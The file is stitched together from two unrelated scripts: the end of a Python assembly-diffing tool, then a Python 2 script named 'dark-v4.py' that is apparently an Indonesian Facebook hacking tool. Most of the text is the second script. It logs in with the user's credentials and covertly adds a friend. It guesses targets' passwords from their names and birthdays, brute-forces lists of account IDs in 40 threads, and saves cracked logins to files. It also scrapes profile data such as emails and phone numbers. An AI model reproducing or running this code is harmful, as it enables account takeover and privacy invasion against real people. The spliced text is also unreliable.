def changed(self, path: str) -> None:
if self.should_notify(path):
self.queue.put(time.time())
def debounce_thread() -> NoReturn:
listenq: "queue.Queue[float]" = queue.Queue()
file_targets: List[str] = []
event_handler = WatchEventHandler(listenq, file_targets)
observer = watchdog.observers.Observer()
observed = set()
for target in targets:
if os.path.isdir(target):
observer.schedule(event_handler, target, recursive=True)
else:
file_targets.append(os.path.normpath(target))
target = os.path.dirname(target) or "."
if target not in observed:
observed.add(target)
observer.schedule(event_handler, target)
observer.start()
while True:
t = listenq.get()
more = True
while more:
delay = t + DEBOUNCE_DELAY - time.time()
if delay > 0:
time.sleep(delay)
# consume entire queue
more = False
try:
while True:
t = listenq.get(block=False)
more = True
except queue.Empty:
pass
outq.put(t)
th = threading.Thread(target=debounce_thread, daemon=True)
th.start()
class Display:
basedump: str
mydump: str
last_refresh_key: object
config: Config
emsg: Optional[str]
last_diff_output: Optional[Diff]
pending_update: Optional[str]
ready_queue: "queue.Queue[None]"
watch_queue: "queue.Queue[Optional[float]]"
less_proc: "Optional[subprocess.Popen[bytes]]"
def __init__(self, basedump: str, mydump: str, config: Config) -> None:
self.config = config
self.base_lines = process(basedump, config)
self.mydump = mydump
self.emsg = None
self.last_refresh_key = None
self.last_diff_output = None
def run_diff(self) -> Tuple[str, object]:
if self.emsg is not None:
return (self.emsg, self.emsg)
my_lines = process(self.mydump, self.config)
diff_output = do_diff(self.base_lines, my_lines, self.config)
last_diff_output = self.last_diff_output or diff_output
if self.config.threeway != "base" or not self.last_diff_output:
self.last_diff_output = diff_output
meta, diff_lines = align_diffs(last_diff_output, diff_output, self.config)
output = self.config.formatter.table(meta, diff_lines)
refresh_key = (
[line.key2 for line in diff_output.lines],
diff_output.score,
)
return (output, refresh_key)
def run_less(
self, output: str
) -> "Tuple[subprocess.Popen[bytes], subprocess.Popen[bytes]]":
# Pipe the output through 'tail' and only then to less, to ensure the
# write call doesn't block. ('tail' has to buffer all its input before
# it starts writing.) This also means we don't have to deal with pipe
# closure errors.
buffer_proc = subprocess.Popen(
BUFFER_CMD, stdin=subprocess.PIPE, stdout=subprocess.PIPE
)
less_proc = subprocess.Popen(LESS_CMD, stdin=buffer_proc.stdout)
assert buffer_proc.stdin
assert buffer_proc.stdout
buffer_proc.stdin.write(output.encode())
buffer_proc.stdin.close()
buffer_proc.stdout.close()
return (buffer_proc, less_proc)
def run_sync(self) -> None:
output, _ = self.run_diff()
proca, procb = self.run_less(output)
procb.wait()
proca.wait()
def run_async(self, watch_queue: "queue.Queue[Optional[float]]") -> None:
self.watch_queue = watch_queue
self.ready_queue = queue.Queue()
self.pending_update = None
output, refresh_key = self.run_diff()
self.last_refresh_key = refresh_key
dthread = threading.Thread(target=self.display_thread, args=(output,))
dthread.start()
self.ready_queue.get()
def display_thread(self, initial_output: str) -> None:
proca, procb = self.run_less(initial_output)
self.less_proc = procb
self.ready_queue.put(None)
while True:
ret = procb.wait()
proca.wait()
self.less_proc = None
if ret != 0:
# fix the terminal
os.system("tput reset")
if ret != 0 and self.pending_update is not None:
# killed by program with the intent to refresh
output = self.pending_update
self.pending_update = None
proca, procb = self.run_less(output)
self.less_proc = procb
self.ready_queue.put(None)
else:
# terminated by user, or killed
self.watch_queue.put(None)
self.ready_queue.put(None)
break
def progress(self, msg: str) -> None:
# Write message to top-left corner
sys.stdout.write("\x1b7\x1b[1;1f{}\x1b8".format(msg + " "))
sys.stdout.flush()
def update(self, text: str, error: bool) -> None:
if not error and not self.emsg and text == self.mydump:
self.progress("Unchanged. ")
return
if not error:
self.mydump = text
self.emsg = None
else:
self.emsg = text
output, refresh_key = self.run_diff()
if refresh_key == self.last_refresh_key:
self.progress("Unchanged. ")
return
self.last_refresh_key = refresh_key
self.pending_update = output
if not self.less_proc:
return
self.less_proc.kill()
self.ready_queue.get()
def terminate(self) -> None:
if not self.less_proc:
return
self.less_proc.kill()
self.ready_queue.get()
def main() -> None:
args = parser.parse_args()
# Apply project-specific configuration.
settings: Dict[str, Any] = {}
diff_settings.apply(settings, args) # type: ignore
project = create_project_settings(settings)
try:
config = create_config(args, project)
except ValueError as e:
fail(str(e))
if config.algorithm == "levenshtein":
try:
import Levenshtein
except ModuleNotFoundError as e:
fail(MISSING_PREREQUISITES.format(e.name))
if config.show_source:
try:
import cxxfilt
except ModuleNotFoundError as e:
fail(MISSING_PREREQUISITES.format(e.name))
if config.threeway and not args.watch:
fail("Threeway diffing requires -w.")
if args.diff_elf_symbol:
make_target, basecmd, mycmd = dump_elf(
args.start, args.end, args.diff_elf_symbol, config, project
)
elif config.diff_obj:
make_target, basecmd, mycmd = dump_objfile(
args.start, args.end, config, project
)
else:
make_target, basecmd, mycmd = dump_binary(args.start, args.end, config, project)
map_build_target_fn = getattr(diff_settings, "map_build_target", None)
if map_build_target_fn:
make_target = map_build_target_fn(make_target=make_target)
if args.write_asm is not None:
mydump = run_objdump(mycmd, config, project)
with open(args.write_asm, "w") as f:
f.write(mydump)
print(f"Wrote assembly to {args.write_asm}.")
sys.exit(0)
if args.base_asm is not None:
with open(args.base_asm) as f:
basedump = f.read()
else:
basedump = run_objdump(basecmd, config, project)
mydump = run_objdump(mycmd, config, project)
display = Display(basedump, mydump, config)
if args.no_pager or args.format in ("html", "json"):
print(display.run_diff()[0])
elif not args.watch:
display.run_sync()
else:
if not args.make:
yn = input(
"Warning: watch-mode (-w) enabled without auto-make (-m). "
"You will have to run make manually. Ok? (Y/n) "
)
if yn.lower() == "n":
return
if args.make:
watch_sources = None
watch_sources_for_target_fn = getattr(
diff_settings, "watch_sources_for_target", None
)
if watch_sources_for_target_fn:
watch_sources = watch_sources_for_target_fn(make_target)
watch_sources = watch_sources or project.source_directories
if not watch_sources:
fail("Missing source_directories config, don't know what to watch.")
else:
watch_sources = [make_target]
q: "queue.Queue[Optional[float]]" = queue.Queue()
debounced_fs_watch(watch_sources, q, config, project)
display.run_async(q)
last_build = 0.0
try:
while True:
t = q.get()
if t is None:
break
if t < last_build:
continue
last_build = time.time()
if args.make:
display.progress("Building...")
ret = run_make_capture_output(make_target, project)
if ret.returncode != 0:
display.update(
ret.stderr.decode("utf-8-sig", "replace")
or ret.stdout.decode("utf-8-sig", "replace"),
error=True,
)
continue
mydump = run_objdump(mycmd, config, project)
display.update(mydump, error=False)
except KeyboardInterrupt:
display.terminate()
if __name__ == "__main__":
main()
|
dark-v4.py
|
# -*- coding: utf-8 -*-
import os, sys
print '\x1b[1;33mSudah punya ID dan Password nya?'
print '\x1b[1;32mSilahkan Login '
import os, sys
def wa():
os.system('xdg-open https://api.whatsapp.com/send?phone=6289698096572&text=Assalamualaikum')
def restart():
ngulang = sys.executable
os.execl(ngulang, ngulang, *sys.argv)
user = raw_input('ID: ')
import getpass
sandi = raw_input('Password: ')
if sandi == '211743' and user == 'USER':
print 'Anda Telah Login'
sys.exit
else:
print 'Login GAGAL, Silahkan hubungi ADMIN'
wa()
restart()
import os, sys, time, datetime, random, hashlib, re, threading, json, getpass, urllib
from multiprocessing.pool import ThreadPool
try:
import mechanize
except ImportError:
os.system('pip2 install mechanize')
else:
try:
import requests
except ImportError:
os.system('pip2 install requests')
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print '\x1b[1;91m[!] Closed'
os.sys.exit()
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.01)
logo = " \x1b[31;1m█████████\n \x1b[31;1m█▄█████▄█ \x1b[0;36m●▬▬▬▬▬▬▬▬▬๑۩۩๑▬▬▬▬▬▬▬▬●\n \x1b[31;1m█ \x1b[1;91m▼▼▼▼▼ \x1b[1;97m- _ --_-- \x1b[1;33m╔╦╗┌─┐┬─┐┬┌─ ╔═╗╔╗ \n \x1b[31;1m█ \x1b[1;97m \x1b[1;97m_-_-- -_ --__ \x1b[1;33m ║║├─┤├┬┘├┴┐───╠╣ ╠╩╗\n \x1b[1;97m█ \x1b[1;91m▲▲▲▲▲ \x1b[1;97m-- - _ -- \x1b[1;33m═╩╝┴ ┴┴└─┴ ┴ ╚ ╚═╝ \x1b[37;1mVIP.V4\n \x1b[1;97m█████████ \x1b[0;36m«==========✧==========»\n \x1b[1;97m ██ ██\n \x1b[1;97m╔══════════════════════════════════════════════════╗\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mAdmin \x1b[1;91m : \x1b[1;96m ABDULLAH NURYADIN \x1b[1;97m ║\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mGitHub \x1b[1;91m: \x1b[1;92m \x1b[92mhttps://github.com/SUMBEREJO123\x1b[ \x1b[1;97m ║\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mWA \x1b[1;91m: \x1b[1;92\x1b[92m089698096572\x1b[ \x1b[1;97m ║ \n \x1b[1;97m╚══════════════════════════════════════════════════╝" '\n \x1b[1;91m[\xe2\x98\x86] \x1b[37;1mSUBSCRIBE CHANNEL CALON PRO GAMING \x1b[1;91m[\xe2\x98\x86]' '\n \x1b[1;91m[\xe2\x98\x86] \x1b[37;1mTerimakasih Udah Support Channel Ini \x1b[1;91m[\xe2\x98\x86]' '\n \x1b[1;91m[\xe2\x98\x86] \x1b[37;1mGunakan Tool Ini Dengan Sebaik Mungkin\x1b[1;91m[\xe2\x98\x86]'
def tik():
titik = [
'. ', '.. ', '... ']
for o in titik:
print '\r\x1b[1;91m[\xe2\x97\x8f] \x1b[1;92mLoading \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(4)
back = 0
threads = []
berhasil = []
cekpoint = []
gagal = []
idfriends = []
idfromfriends = []
idmem = []
id = []
em = []
emfromfriends = []
hp = []
hpfromfriends = []
reaksi = []
reaksigrup = []
komen = []
komengrup = []
listgrup = []
vulnot = '\x1b[31mNot Vuln'
vuln = '\x1b[32mVuln'
def login():
os.system('clear')
try:
toket = open('login.txt', 'r')
menu()
except (KeyError, IOError):
os.system('clear')
print logo
print 54 * '\x1b[1;97m\xe2\x95\x90'
print '\n \x1b[1;91m[\xe2\x98\x86] \x1b[1;92mMASUK AKUN FACEBOOK \x1b[1;91m[\xe2\x98\x86]'
id = raw_input('\n \x1b[1;91m[+] \x1b[1;36mEmail \x1b[1;91m:\x1b[1;92m ')
pwd = getpass.getpass('\n \x1b[1;91m[+] \x1b[1;36mSandi \x1b[1;91m:\x1b[1;92m ')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print '\n\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig = 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail=' + id + 'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword=' + pwd + 'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {'api_key': '882a8490361da98702bf97a021ddc14d', 'credentials_type': 'password', 'email': id, 'format': 'JSON', 'generate_machine_id': '1', 'generate_session_cookies': '1', 'locale': 'en_US', 'method': 'auth.login', 'password': pwd, 'return_ssl_resources': '0', 'v': '1.0'}
x = hashlib.new('md5')
x.update(sig)
a = x.hexdigest()
data.update({'sig': a})
url = 'https://api.facebook.com/restserver.php'
r = requests.get(url, params=data)
z = json.loads(r.text)
zedd = open('login.txt', 'w')
zedd.write(z['access_token'])
zedd.close()
print '\n\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mLogin success'
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token=' + z['access_token'])
os.system('xdg-open https://www.youtube.com/channel/UCEvS21vFrzxtqykmqse_9Qw ')
time.sleep(1)
menu()
except requests.exceptions.ConnectionError:
print '\n\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
if 'checkpoint' in url:
print '\n\x1b[1;91m[!] \x1b[1;93mAccount Has Been Checkpoint'
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print '\n\x1b[1;91m[!] Gagal Masuk'
os.system('rm -rf login.txt')
time.sleep(1)
login()
def menu():
try:
toket = open('login.txt', 'r').read()
except IOError:
os.system('clear')
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
otw = requests.get('https://graph.facebook.com/me?access_token=' + toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
ots = requests.get('https://graph.facebook.com/me/subscribers?access_token=' + toket)
b = json.loads(ots.text)
sub = str(b['summary']['total_count'])
except KeyError:
os.system('clear')
print '\x1b[1;91m[!] \x1b[1;93mSepertinya akun kena Checkpoint'
os.system('rm -rf login.txt')
time.sleep(1)
login()
except requests.exceptions.ConnectionError:
print logo
print '\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
os.system('clear')
print logo
print '\x1b[1;97m\xe2\x95\x94' + 50 * '\xe2\x95\x90' + '╗'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Name \x1b[1;91m: \x1b[1;92m' + nama + (39 - len(nama)) * '\x1b[1;97m ' + '║'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m FBID \x1b[1;91m: \x1b[1;92m' + id + (39 - len(id)) * '\x1b[1;97m ' + '║'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Subs \x1b[1;91m: \x1b[1;92m' + sub + (39 - len(sub)) * '\x1b[1;97m ' + '║'
print '\x1b[1;97m╠' + 50 * '\xe2\x95\x90' + '╝'
print '║--> \x1b[1;37;40m1. User Informasi'
print '║--> \x1b[1;37;40m2. Hack Akun Facebook '
print '║--> \x1b[1;37;40m3. Bot'
print '║--> \x1b[1;37;40m4. Others'
print '║--> \x1b[1;37;40m5. Logout'
print '║--> \x1b[1;31;40m0. Exit'
print '\x1b[1;37;40m║'
pilih()
def pilih():
zedd = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if zedd == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih()
else:
if zedd == '1':
informasi()
else:
if zedd == '2':
menu_hack()
else:
if zedd == '3':
menu_bot()
else:
if zedd == '4':
lain()
else:
if zedd == '5':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
os.system('git pull origin master')
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
else:
if zedd == '6':
os.system('rm -rf login.txt')
os.system('xdg-open https://m.facebook.com/rizz.magizz')
keluar()
else:
if zedd == '0':
keluar()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + zedd + ' \x1b[1;91mNot availabel'
pilih()
def informasi():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
id = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID\x1b[1;97m/\x1b[1;92mName\x1b[1;91m : \x1b[1;97m')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
cok = json.loads(r.text)
for p in cok['data']:
if id in p['name'] or id in p['id']:
r = requests.get('https://graph.facebook.com/' + p['id'] + '?access_token=' + toket)
z = json.loads(r.text)
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mName\x1b[1;97m : ' + z['name']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mName\x1b[1;97m : \x1b[1;91mNot found'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID\x1b[1;97m : ' + z['id']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mID\x1b[1;97m : \x1b[1;91mNot found'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail\x1b[1;97m : ' + z['email']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mEmail\x1b[1;97m : \x1b[1;91mNot found'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPhone Number\x1b[1;97m : ' + z['mobile_phone']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mPhone Number\x1b[1;97m : \x1b[1;91mNot found'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mLocation\x1b[1;97m : ' + z['location']['name']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mLocation\x1b[1;97m : \x1b[1;91mNot found'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mBirthday\x1b[1;97m : ' + z['birthday']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mBirthday\x1b[1;97m : \x1b[1;91mNot found'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mSchool\x1b[1;97m : '
for q in z['education']:
try:
print '\x1b[1;91m ~ \x1b[1;97m' + q['school']['name']
except KeyError:
print '\x1b[1;91m ~ \x1b[1;91mNot found'
except KeyError:
pass
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] User not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
def menu_hack():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Mini HACK Facebook (\x1b[1;92mTarget\x1b[1;97m)'
print '║-> \x1b[1;37;40m2. Multi Bruteforce Facebook File Id'
print '║-> \x1b[1;37;40m3. Super Multi Bruteforce Facebook'
print '║-> \x1b[1;37;40m4. BruteForce Wordlist(\x1b[1;92mTarget\x1b[1;97m)'
print '║-> \x1b[1;37;40m5. Yahoo Checker'
print '║-> \x1b[1;37;40m6. Get ID/Email/HP'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
hack_pilih()
def hack_pilih():
hack = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if hack == '':
print '\x1b[1;91m[!] Can\'t empty'
hack_pilih()
else:
if hack == '1':
mini()
else:
if hack == '2':
crack()
hasil()
else:
if hack == '3':
super()
else:
if hack == '4':
brute()
else:
if hack == '5':
menu_yahoo()
else:
if hack == '6':
grab()
else:
if hack == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + hack + ' \x1b[1;91mNot found'
hack_pilih()
def mini():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[ INFO ] Target must be your friend !'
try:
id = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket)
a = json.loads(r.text)
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mName\x1b[1;97m : ' + a['name']
jalan('\x1b[1;91m[+] \x1b[1;92mChecking \x1b[1;97m...')
time.sleep(2)
jalan('\x1b[1;91m[+] \x1b[1;92mOpen security \x1b[1;97m...')
time.sleep(2)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
pz1 = a['first_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz2 = a['first_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz3 = a['last_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
lahir = a['birthday']
pz4 = lahir.replace('/', '')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
print '\x1b[1;91m[!] Sorry, opening password target failed :('
print '\x1b[1;91m[!] Try other method.'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
except KeyError:
print '\x1b[1;91m[!] Terget not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
def crack():
global file
global idlist
global passw
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mPassword \x1b[1;91m: \x1b[1;97m')
try:
file = open(idlist, 'r')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
for x in range(40):
zedd = threading.Thread(target=scrak, args=())
zedd.start()
threads.append(zedd)
for zedd in threads:
zedd.join()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
def scrak():
global back
global berhasil
global cekpoint
global gagal
global up
try:
buka = open(idlist, 'r')
up = buka.read().split()
while file:
username = file.readline().strip()
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + passw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data = urllib.urlopen(url)
mpsh = json.load(data)
if back == len(up):
break
if 'access_token' in mpsh:
bisa = open('Berhasil.txt', 'w')
bisa.write(username + ' | ' + passw + '\n')
bisa.close()
berhasil.append('\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
if 'www.facebook.com' in mpsh['error_msg']:
cek = open('Cekpoint.txt', 'w')
cek.write(username + ' | ' + passw + '\n')
cek.close()
cekpoint.append('\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
gagal.append(username)
back += 1
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;91m:\x1b[1;97m ' + str(back) + ' \x1b[1;96m>\x1b[1;97m ' + str(len(up)) + ' =>\x1b[1;92mLive\x1b[1;91m:\x1b[1;96m' + str(len(berhasil)) + ' \x1b[1;97m=>\x1b[1;93mCheck\x1b[1;91m:\x1b[1;96m' + str(len(cekpoint)))
sys.stdout.flush()
except IOError:
print '\n\x1b[1;91m[!] Connection busy'
time.sleep(1)
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
def hasil():
print
print 52 * '\x1b[1;97m\xe2\x95\x90'
for b in berhasil:
print b
for c in cekpoint:
print c
print
print '\x1b[31m[x] Failed \x1b[1;97m--> ' + str(len(gagal))
keluar()
def super():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Crack from Friends'
